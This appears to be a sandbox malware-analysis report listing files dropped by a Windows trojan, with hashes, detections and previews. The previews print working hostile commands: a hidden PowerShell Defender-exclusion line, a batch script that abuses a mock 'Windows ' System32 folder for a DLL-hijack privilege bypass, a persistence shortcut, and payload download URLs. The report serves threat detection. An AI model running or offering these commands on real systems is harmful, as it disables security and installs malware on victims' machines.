                                                                        C:\Users\Public\Cdex.bat
                                                                        Process:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):148
                                                                        Entropy (8bit):4.679047668453471
                                                                        Encrypted:false
                                                                        SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRAt:rz81R3KnMMQ75ieGgdEYlRAt
                                                                        MD5:84DE6CF0B720DB43F85D95204A2C1902
                                                                        SHA1:C87C4C1F3AD9F28968C46A89C4FFF8BDB867B006
                                                                        SHA-256:BC4BAAD4A7983C54C1764B0AA57F12D536CE506253C82E06DD98E17BBB5F77EE
                                                                        SHA-512:5FD018B5F72797A64934F8F35D4510EF95C235442A807D476E7FD3C14EAA854C1A3092332EDBDD1028F8954AB28ACB5AAB8720A74226CFCFAB3CB3A7772A64B7
                                                                        Malicious:false
                                                                        Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                        C:\Users\Public\Citvon\Citvon.exe
                                                                        Process:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):721408
                                                                        Entropy (8bit):6.799965627764192
                                                                        Encrypted:false
                                                                        SSDEEP:12288:hrnWDrl98a7LUacm7sbiD97T5QM4Pr4rvU/Oy/6:hrWnZnUivR71B48rvUD/6
                                                                        MD5:4E71F90D1817F44313F4E101EF393968
                                                                        SHA1:3932F9822134761E7BF9BC1902F8CC28B6820559
                                                                        SHA-256:AACE20E28E61CB328DA74FF938231B1CE9A07498D477EFE3EFC5C5D3D04B9DC1
                                                                        SHA-512:A50C0E27009521B2F34358FB3BC30AFB661B75CB6BA715AC8BE15F412B50600DC3A474BD90DE74C1E1B3941F3BC0D80C7B7E16AA26969A4250EC7F4DCD234419
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: Metadefender, Detection: 44%, Browse
                                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................P.......w...........@...........................@..<'......^G.......................l..................................................................................CODE................................ ..`DATA................................@...BSS..........0...........................idata..<'...@...(..................@....tls.........p.......F...................rdata...............F..............@..P.reloc...l.......n...H..............@..P.rsrc...^G.......H..................@..P.............p......................@..P........................................................................................................................................
                                                                        C:\Users\Public\NETUTILS.dll
                                                                        Process:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):111917
                                                                        Entropy (8bit):5.03897475395042
                                                                        Encrypted:false
                                                                        SSDEEP:1536:noJ4LH1bID3TdytQXt1amsk6B1w5jZcrjjAoeCl7MbiRtRDe2b:oKH1U/b1a5B1McrjjAo1RDe2b
                                                                        MD5:39507D772C63CA496A25A14A8B5D14B2
                                                                        SHA1:5B603F5C11EB9AB4313694315B4D4894FF4641D4
                                                                        SHA-256:36D1FA474CD8271F9B74B9481025614B6FF309F767F69D9F1FF3960C7205AD12
                                                                        SHA-512:0C740FD7B6D67D9938B0D8E1EA7D6C41910DD6D0B85B4EC8B6015FF8C0C73798DEE01F01DA0B5B0C07038663ACA7945FACA0E2B5AFC1CB751AABA7567D332F5F
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Metadefender, Detection: 5%, Browse
                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                        Joe Sandbox View:
                                                                        • Filename: 21edfbb7_by_Libranalysis.exe, Detection: malicious, Browse
                                                                        • Filename: Waybill Document 22700456.exe, Detection: malicious, Browse
                                                                        • Filename: Give Offer CVE6535 _TVOP-MIO, pdf.exe, Detection: malicious, Browse
                                                                        • Filename: aFMnf1WQEQ.exe, Detection: malicious, Browse
                                                                        • Filename: 1RsYL7DWnf.exe, Detection: malicious, Browse
                                                                        • Filename: 5a96079f_by_Libranalysis.exe, Detection: malicious, Browse
                                                                        • Filename: SOA May.xlt, Detection: malicious, Browse
                                                                        • Filename: SecuriteInfo.com.Mal.Generic-S.21221.exe, Detection: malicious, Browse
                                                                        • Filename: RFQ-00205-0305.exe, Detection: malicious, Browse
                                                                        • Filename: Almadeena-Bakery-005445536555665445.scr.exe, Detection: malicious, Browse
                                                                        • Filename: Ygqayrvpsvjdxblkzsmxymjfnxukvrdvft_Signed_.exe, Detection: malicious, Browse
                                                                        • Filename: To1sRo1E8P.exe, Detection: malicious, Browse
                                                                        • Filename: wNgiGmsOwT.exe, Detection: malicious, Browse
                                                                        • Filename: BhTxt5BUvy.exe, Detection: malicious, Browse
                                                                        • Filename: Payment.exe, Detection: malicious, Browse
                                                                        • Filename: Urgente RFQ_AP65425652_032421,pdf.exe, Detection: malicious, Browse
                                                                        • Filename: Swift.exe, Detection: malicious, Browse
                                                                        • Filename: Kemmler-New order requirement 90901U,pdf.exe, Detection: malicious, Browse
                                                                        • Filename: __RFQAP65425652032421_pdf.exe, Detection: malicious, Browse
                                                                        • Filename: docs-00425.exe, Detection: malicious, Browse
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a`.R..v.....& ..........................<a............................. ............... .................................................P............P..................\........................... ...(.......................X............................text...@........................... .P`.data...P....0......."..............@.P..rdata.......@.......$..............@.P@.pdata.......P.......*..............@.0@.xdata.......`......................@.0@.bss.........p........................p..edata...............0..............@.0@.idata..P............2..............@.0..CRT....X............:..............@.@..tls....h............<..............@.`..reloc..\............>..............@.0B/4...................@..............@.PB/19..................D..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....
                                                                        C:\Users\Public\Netplwiz.exe
                                                                        Process:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):40448
                                                                        Entropy (8bit):5.6272204024236245
                                                                        Encrypted:false
                                                                        SSDEEP:768:qt4lgFHE9Lm2kEwBrIit865IKX+1XycvydfUrh6WeENiJDBPrxZt4A:SmUFBIiGYIk+1RvyweWSDBPrxZaA
                                                                        MD5:F94B7FB6DAC49844D03C7087B2D8B472
                                                                        SHA1:0E84139FCED0EE8EF929D0BD5F01559A7DCF1DB0
                                                                        SHA-256:46E31F337ED0D9A6FE3F159ABC91C9B9B6A6062982BBCD84A51784D7128E7AE4
                                                                        SHA-512:D63878F94F7699E4CC63C2CD885C29455E0C423D32DBA750E4FC3AA74DBACA80A1A4B176719213B9FC6584DE6A40CDDFF7864C7FB4CFBA13DFCB437A36E41B80
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................P......P......P......P..........@...P......P.|.....P......Rich............PE..d................"......2...n.......8.........@....................................G4....`.......... .......................................\...........F......................4....W..T............................P...............Q...............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data........p.......N..............@....pdata...............P..............@..@.rsrc....F.......H...T..............@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................
                                                                        C:\Users\Public\PXOR.bat
                                                                        Process:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):278
                                                                        Entropy (8bit):4.795821984803914
                                                                        Encrypted:false
                                                                        SSDEEP:6:tPUx2cL4Vjh2cLuULT2cL9s2cL22vKZ2cLAP2cL4nTeov:tPhy6L6wXc7tOeov
                                                                        MD5:0D8AEF656413642F55E0902CC5DF5E6F
                                                                        SHA1:73EC56D08BD9B3C45D55C97BD1C1286B77C8FF49
                                                                        SHA-256:670F94B92F45BC2F3F44A80C7F3021F874AA16FDE38ED7D7F3EBED13AE09FA11
                                                                        SHA-512:EFE690B1BCF06E16BE469622B45C98B5DC1F1E06410CBF7E7DCCB2975524C4D6BC7E23DE9A129D50D73CD924F02E23F925555894F2C7DA1064DCC57151F50876
                                                                        Malicious:false
                                                                        Preview: mkdir "\\?\C:\Windows " ..mkdir "\\?\C:\Windows \System32"..copy "Netplwiz.exe" "C:\Windows \System32\"..copy "netutils.dll" "C:\Windows \System32\".."C:\Windows \System32\Netplwiz.exe"..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..EXIT..
                                                                        C:\Users\Public\nest
                                                                        Process:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8
                                                                        Entropy (8bit):3.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:5Qy:5N
                                                                        MD5:34B6D74850A2144456874BA0657E3A8E
                                                                        SHA1:E55B81478C41810C4B637AA92C0BB0A2DD05246B
                                                                        SHA-256:00C3A5CC659C227722FF177F7C70110245541CD234B469D6C843994D020E9C19
                                                                        SHA-512:44C5D3FBE5F9638EA40C5D4B30FFB65AE43F11D41FC8708C686A689830F0CD9E1BF873C624E2AA275C46AFE3AC2E3FC81BD57E277A83B012A01FF17B7A6C29F0
                                                                        Malicious:false
                                                                        Preview: Citvon..
                                                                        C:\Users\Public\novtiC.url
                                                                        Process:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Citvon\\Citvon.exe">), ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):83
                                                                        Entropy (8bit):4.722023052117552
                                                                        Encrypted:false
                                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55725VJiovsGKd6ov:HRYFVmTWDy725VJLvsbDv
                                                                        MD5:11E51DED4E25E47E7457AF16C418D16C
                                                                        SHA1:846658BFF09CC0483DB97E3E77B1CEBCAA82A98C
                                                                        SHA-256:ED740E588D3E2E0EB45DE401021134A19F33FEECC5E1C51C81D56F27E5C93EDB
                                                                        SHA-512:4D7B812A8B3AC9E8FF5F31B595F881B5870082B43DFF6C05BEA319E26619B1F1755A22C349D7B69C4B94471A08A7F0247B002DC5C54F14D94CBC51FBD5322200
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\novtiC.url, Author: @itsreallynick (Nick Carr)
                                                                        Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Citvon\\Citvon.exe"..IconIndex=2..
                                                                        C:\Users\Public\stt.bat
                                                                        Process:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):35
                                                                        Entropy (8bit):4.378864088188097
                                                                        Encrypted:false
                                                                        SSDEEP:3:LjTnaHF51I3LH4:rnaHpS4
                                                                        MD5:8A850253C31DF9A7E1C00C80DF2630D5
                                                                        SHA1:E3DA74081B027A3B591488B28DA22742BCFE8495
                                                                        SHA-256:8FDEBA3EC903BDE700342083D16F72452366AA0B1B30D0E58DEE0AF74CEBFA35
                                                                        SHA-512:30510BDC34680A0865A0811D9BE29DEC91C74717FECCD58C9B4D88E77BE9E5D13A539806A1B2901AFF595B2FE2CC45926B69ED42E899D2DD2913C78A732E84D1
                                                                        Malicious:false
                                                                        Preview: start /min C:\Users\Public\PXOR.bat
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Citvonvhciktufwvyzyhistnewdjgso[2]
                                                                        Process:C:\Users\Public\Citvon\Citvon.exe
                                                                        File Type:data
                                                                        Category:downloaded
                                                                        Size (bytes):422400
                                                                        Entropy (8bit):7.008806645965084
                                                                        Encrypted:false
                                                                        SSDEEP:6144:MJVJm4x18w2eTzzMH9BDO+HNGiczgPpQx5igQVmAav3v6UI5bZJjK1ya:MTJtLoR9BtGicU2+g2YvEdrK1X
                                                                        MD5:2DE8BECCA9D0F6806724B87EA5E78B3D
                                                                        SHA1:835DF69399E5D6F20C345D75C5EDFE5917FB10F0
                                                                        SHA-256:C85914BE1F3036E166FC6637EEE825AE4643C450538CEB3A3BCA4684096A3C93
                                                                        SHA-512:8BC937863FDD6FFC4160A8878065CEF6F7B7EBAB574E649BE43056712609B96C3A87E9C1C119BD1E1990B4DD72A25059296B441479700A76FB0997DDE658291D
                                                                        Malicious:false
                                                                        IE Cache URL:https://xhtfga.dm.files.1drv.com/y4mK9mGYGZoPJZeVlBeKiTjt4bJZ5hifmcGDqMHsmjK6dGB6Axd2pMxW6R4fpxcyAAHGHgaSoYlDQUmy5BOWujymec3D31986Oj8ocC_jaF6S9Aj78jqihY2GhPmZXiRwL8ViJRhIyBPEAWhNFAwvkthj7t0_dMmim9vAeF67iBLiwNR1z4mohW-5X9Rk51AcHVI-Eto9oleZfaePBsaeaKqQ/Citvonvhciktufwvyzyhistnewdjgso?download&psid=1
                                                                        Preview: .cecccgc.c..cc.ccccccc.c}cccccccccccccccccccccccccccccccccc.cc.scq...j....j...................................m..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc..cc..ic....ccccccccCc.>..e.c..ccu.cccccS..ccsccc.ccc.ccsccceccgcccccccgcccccccc.iccgccccccec.cccccccccccsccsccccccsccccccccccccS.c..ccc.gc..ecccccccccccccccccccgc..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc...cccc3..ccsccc..ccgcccccccccccccc.cc...ccccs.ecc.cc.ecc.ccccccccccccc.cc#...cccccr.cccC.cccccc%.cccccccccccccccc#......cc..cccS.ccqccc%.ccccccccccccc.cc#......cc..ccccgcc.ccc3.ccccccccccccc.cc......ccc..ecc.gcc.eccO.ccccccccccccc.cc.ccccccccccccc.gcccccccgccccccccccccc.cc.cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Citvonvhciktufwvyzyhistnewdjgso[1]
                                                                        Process:C:\Users\Public\Citvon\Citvon.exe
                                                                        File Type:data
                                                                        Category:downloaded
                                                                        Size (bytes):422400
                                                                        Entropy (8bit):7.008806645965084
                                                                        Encrypted:false
                                                                        SSDEEP:6144:MJVJm4x18w2eTzzMH9BDO+HNGiczgPpQx5igQVmAav3v6UI5bZJjK1ya:MTJtLoR9BtGicU2+g2YvEdrK1X
                                                                        MD5:2DE8BECCA9D0F6806724B87EA5E78B3D
                                                                        SHA1:835DF69399E5D6F20C345D75C5EDFE5917FB10F0
                                                                        SHA-256:C85914BE1F3036E166FC6637EEE825AE4643C450538CEB3A3BCA4684096A3C93
                                                                        SHA-512:8BC937863FDD6FFC4160A8878065CEF6F7B7EBAB574E649BE43056712609B96C3A87E9C1C119BD1E1990B4DD72A25059296B441479700A76FB0997DDE658291D
                                                                        Malicious:false
                                                                        IE Cache URL:https://xhtfga.dm.files.1drv.com/y4m0u-etdTQtma9eyGnBaXZNWQMwG9GStWS6f7dfJHWJ4qZnagm6vmjluOf5etJgjGdOySymbS7QpDgnRwBlNqi-RKObO74LynjvUV4kQnKhJuuUolLlo1lGAqPKRZiq_b4FMoFDKI9xNeh_6V9nbQmE7c7zs0lauQkQ-aKJ32W5426gA2rHJPrIiFi0aWSR_g510EWbKoU1MH3cpsShYRx9w/Citvonvhciktufwvyzyhistnewdjgso?download&psid=1
                                                                        Preview: .cecccgc.c..cc.ccccccc.c}cccccccccccccccccccccccccccccccccc.cc.scq...j....j...................................m..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc..cc..ic....ccccccccCc.>..e.c..ccu.cccccS..ccsccc.ccc.ccsccceccgcccccccgcccccccc.iccgccccccec.cccccccccccsccsccccccsccccccccccccS.c..ccc.gc..ecccccccccccccccccccgc..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc...cccc3..ccsccc..ccgcccccccccccccc.cc...ccccs.ecc.cc.ecc.ccccccccccccc.cc#...cccccr.cccC.cccccc%.cccccccccccccccc#......cc..cccS.ccqccc%.ccccccccccccc.cc#......cc..ccccgcc.ccc3.ccccccccccccc.cc......ccc..ecc.gcc.eccO.ccccccccccccc.cc.ccccccccccccc.gcccccccgccccccccccccc.cc.cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Citvonvhciktufwvyzyhistnewdjgso[1]
                                                                        Process:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File Type:data
                                                                        Category:downloaded
                                                                        Size (bytes):422400
                                                                        Entropy (8bit):7.008806645965084
                                                                        Encrypted:false
                                                                        SSDEEP:6144:MJVJm4x18w2eTzzMH9BDO+HNGiczgPpQx5igQVmAav3v6UI5bZJjK1ya:MTJtLoR9BtGicU2+g2YvEdrK1X
                                                                        MD5:2DE8BECCA9D0F6806724B87EA5E78B3D
                                                                        SHA1:835DF69399E5D6F20C345D75C5EDFE5917FB10F0
                                                                        SHA-256:C85914BE1F3036E166FC6637EEE825AE4643C450538CEB3A3BCA4684096A3C93
                                                                        SHA-512:8BC937863FDD6FFC4160A8878065CEF6F7B7EBAB574E649BE43056712609B96C3A87E9C1C119BD1E1990B4DD72A25059296B441479700A76FB0997DDE658291D
                                                                        Malicious:false
                                                                        IE Cache URL:https://xhtfga.dm.files.1drv.com/y4mLM7I0znqqPndam59hy6bn9tPJOtRUAdenwP3svRarYt5LnLXiyxI3GRfAdIVWvGEdP7WvwhBY7JBsyH29vKnblrhK-rsbZvfR35i4oVfWbOJtfGvLBFmvJ5WvisBZ0Kk6aB0HngHCTbgLd5zRztJTzzOb0ebWgTwYJsz3wEjvoD0xmXbvprKomPc6ZB1AivMGTYtQ3gfP4I6-6gNnIsy0w/Citvonvhciktufwvyzyhistnewdjgso?download&psid=1
                                                                        Preview: .cecccgc.c..cc.ccccccc.c}cccccccccccccccccccccccccccccccccc.cc.scq...j....j...................................m..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc..cc..ic....ccccccccCc.>..e.c..ccu.cccccS..ccsccc.ccc.ccsccceccgcccccccgcccccccc.iccgccccccec.cccccccccccsccsccccccsccccccccccccS.c..ccc.gc..ecccccccccccccccccccgc..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc...cccc3..ccsccc..ccgcccccccccccccc.cc...ccccs.ecc.cc.ecc.ccccccccccccc.cc#...cccccr.cccC.cccccc%.cccccccccccccccc#......cc..cccS.ccqccc%.ccccccccccccc.cc#......cc..ccccgcc.ccc3.ccccccccccccc.cc......ccc..ecc.gcc.eccO.ccccccccccccc.cc.ccccccccccccc.gcccccccgccccccccccccc.cc.cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1292
                                                                        Entropy (8bit):5.3514758982995145
                                                                        Encrypted:false
                                                                        SSDEEP:24:3vQPpQrLAo4KAxq42qs5qRPsCvKMOoVZe9tCKnKJRSF8PQ9rqen:oPerB4U/q8qRUCvNvfe9tC4aR48Y9Oe
                                                                        MD5:CFB3DA6DC9232314BC42E4E6E0E39985
                                                                        SHA1:1DEEACC4CD17ADA2C5B37B6468B4C6089F89D66F
                                                                        SHA-256:8E899DB87FCC9BD5B0FCBD380FD0B1251B1BBAA8754B4766F58EC539B06E25E7
                                                                        SHA-512:4C799F63DA512C75B639B61C396AC27EC39561D9FE61C4519CBF2AB42C19563C9FE0C61280216B21897156F14A8535D7A6ABB29A20D773269FAD894D6EE72622
                                                                        Malicious:false
                                                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................):gK..G...$.1.q........System.Configuration4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3d0dqmo2.y55.psm1
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_effl5svh.hnm.ps1
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QMQWYHM887V4RPK1MFDO.temp
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6205
                                                                        Entropy (8bit):3.7727429090688682
                                                                        Encrypted:false
                                                                        SSDEEP:96:kqP9mwcDf60CO+S/qRkvhkvCCtRTjHKTjHA:VP9mw6UPNRqg
                                                                        MD5:B6105AB09B5AE526B43F91489DBF54C6
                                                                        SHA1:8B520F760BE3D1A7EA41C22AABACA74DE1EEF1E3
                                                                        SHA-256:587A5DB6417967E12F30DA2AC97EFE6C74FBB6E81C30DBCDE9178A3A7D590F83
                                                                        SHA-512:D8CA844F6131977AA7795E733C0DCF5DFC4381C4040576203039A34935574FE679DEF8046AEBE080C323F1781C31E967E88CB62F5EEC18549279DECEA26D2359
                                                                        Malicious:false
                                                                        Preview: ...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-..DU.U....HL...F......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...R.#.....Y....................yN|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...R.#.....Y.....................K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N...R.#.....Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....>Q}<..Windows.@.......N..>Q}<.....Y........................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N..>Q.;.....Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N..>Q.;.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..>QZ7.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........
                                                                        C:\Users\user\Documents\20210512\PowerShell_transcript.124406.e+5goyTn.20210512063021.txt
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4575
                                                                        Entropy (8bit):5.397462741017283
                                                                        Encrypted:false
                                                                        SSDEEP:96:BZpjFNzKqDo1ZKZijFNzKqDo1Z06oGZsjFNzKqDo1ZZfiKZ6:M
                                                                        MD5:2D23D4BA2AB09415726DDCB9ACE028A6
                                                                        SHA1:9BD3145B462996389FC79114DBAC40B11568AD9E
                                                                        SHA-256:9255940A1212CC4D47F26923ADB370BD74AE86B83229894EB86EA0D49865D3FA
                                                                        SHA-512:EFA68E3449567351EFE771C3EF49E1096C126DD3610B4B6372E247825A04DCA7DB210DD8A42A22F745BF4CCBA276351F0EBD496C52DCF3265446A4CFBD480FF8
                                                                        Malicious:false
                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210512063021..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users'..Process ID: 6920..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210512063021..**********************..PS>Add-MpPreference -ExclusionPath 'C:\Users'..**********************..Windows PowerShell transcript start..Start time: 20210512063516..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 1
                                                                        C:\Windows \System32\NETUTILS.dll
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):111917
                                                                        Entropy (8bit):5.03897475395042
                                                                        Encrypted:false
                                                                        SSDEEP:1536:noJ4LH1bID3TdytQXt1amsk6B1w5jZcrjjAoeCl7MbiRtRDe2b:oKH1U/b1a5B1McrjjAo1RDe2b
                                                                        MD5:39507D772C63CA496A25A14A8B5D14B2
                                                                        SHA1:5B603F5C11EB9AB4313694315B4D4894FF4641D4
                                                                        SHA-256:36D1FA474CD8271F9B74B9481025614B6FF309F767F69D9F1FF3960C7205AD12
                                                                        SHA-512:0C740FD7B6D67D9938B0D8E1EA7D6C41910DD6D0B85B4EC8B6015FF8C0C73798DEE01F01DA0B5B0C07038663ACA7945FACA0E2B5AFC1CB751AABA7567D332F5F
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Metadefender, Detection: 5%, Browse
                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a`.R..v.....& ..........................<a............................. ............... .................................................P............P..................\........................... ...(.......................X............................text...@........................... .P`.data...P....0......."..............@.P..rdata.......@.......$..............@.P@.pdata.......P.......*..............@.0@.xdata.......`......................@.0@.bss.........p........................p..edata...............0..............@.0@.idata..P............2..............@.0..CRT....X............:..............@.@..tls....h............<..............@.`..reloc..\............>..............@.0B/4...................@..............@.PB/19..................D..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....
                                                                        C:\Windows \System32\Netplwiz.exe
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):40448
                                                                        Entropy (8bit):5.6272204024236245
                                                                        Encrypted:false
                                                                        SSDEEP:768:qt4lgFHE9Lm2kEwBrIit865IKX+1XycvydfUrh6WeENiJDBPrxZt4A:SmUFBIiGYIk+1RvyweWSDBPrxZaA
                                                                        MD5:F94B7FB6DAC49844D03C7087B2D8B472
                                                                        SHA1:0E84139FCED0EE8EF929D0BD5F01559A7DCF1DB0
